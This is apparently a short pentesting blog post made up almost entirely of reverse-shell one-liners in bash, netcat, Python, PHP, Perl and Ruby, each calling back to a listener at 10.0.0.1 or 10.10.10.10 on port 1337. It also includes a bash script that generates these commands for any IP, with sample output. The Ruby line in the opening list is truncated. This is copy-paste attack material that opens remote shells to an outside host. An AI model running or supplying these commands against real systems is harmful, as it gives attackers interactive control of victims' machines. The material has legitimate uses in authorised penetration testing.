Some very common methods for reverse shells are found on pentestmonkey.net. I’ll be using some of these in this post.

Common Reverse Shells

Bash

bash -i >& /dev/tcp/10.0.0.1/1337 0>&1

Netcat

If netcat supports the -e option:

nc -e /bin/sh 10.0.0.1 1337

If netcat does not support the -e option:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1337).to_i;exec sprintf("/bin/sh -i <&%d

I always go to the pentest monkey site to look them up, but that takes some time. I wrote a quick shell script that takes an IP address and prints a list of shells.

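#!/bin/bash

# author kegn
# simple shell script that just makes easy copy-paste shells for testing
# shells from pentestmonkey

# usage: ./shellmaker <local ip>
#   <local ip>  address of the listener the printed one-liners connect back to

# Strict mode: abort on unhandled errors, unset variables and failed pipelines.
set -euo pipefail

# Listener address from the command line. Defaults to empty (instead of
# tripping `set -u`) so that printshells can emit a usage message itself.
lip=${1:-}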

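#######################################
# Print one green heading plus one one-liner, followed by a blank line.
# Arguments: $1 - heading text
#            $2 - command text, printed verbatim (never used as a printf format)
# Outputs:   three lines on stdout
#######################################
_print_entry() {
  printf '\033[32m[*] %s\033[0m\n' "$1"
  printf '%s\n\n' "$2"
}

#######################################
# Print a copy-paste reverse-shell one-liner for each language, all pointing
# at the same listener address and port.
# Globals:   lip (read) - fallback listener address when $1 is not given
# Arguments: $1 - listener address (optional; defaults to $lip)
# Outputs:   the one-liners on stdout; a usage line on stderr when no
#            address is available
# Returns:   0 on success, 2 when no listener address was supplied
#######################################
printshells() {
  local ip=${1:-${lip:-}}
  local -r port=1337

  # Without an address every one-liner would be printed with an empty host,
  # which is easy to miss when copy-pasting; fail loudly instead.
  if [[ -z "$ip" ]]; then
    printf 'usage: %s <local ip>\n' "${0##*/}" >&2
    return 2
  fi

  _print_entry "Netcat Shell" "nc -e /bin/sh $ip $port"
  _print_entry "Netcat Shell (no -e)" "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f"
  _print_entry "Bash Shell" "bash -i >& /dev/tcp/$ip/$port 0>&1"
  _print_entry "Python Shell" "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
  _print_entry "PHP Shell" "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
  _print_entry "Perl Shell" "perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
  _print_entry "Ruby Shell" "ruby -rsocket -e'f=TCPSocket.open(\"$ip\",$port).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
}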


#######################################
# Entry point: print the one-liners for the address given on the command line.
# Arguments: "$@" - the script's arguments (first one is the listener address)
#######################################
main() {
  printshells "$@"
}

main "$@"

Script output:

[root@kadi pentest-tools]# ./shell-maker.sh 10.10.10.10
[*] Netcat Shell
nc -e /bin/sh 10.10.10.10 1337

[*] Netcat Shell (no -e)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1337 >/tmp/f

[*] Bash Shell
bash -i >& /dev/tcp/10.10.10.10/1337 0>&1

[*] Python Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[*] PHP Shell
php -r '$sock=fsockopen("10.10.10.10",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

[*] Perl Shell
perl -e 'use Socket;$i="10.10.10.10";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

[*] Ruby Shell
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'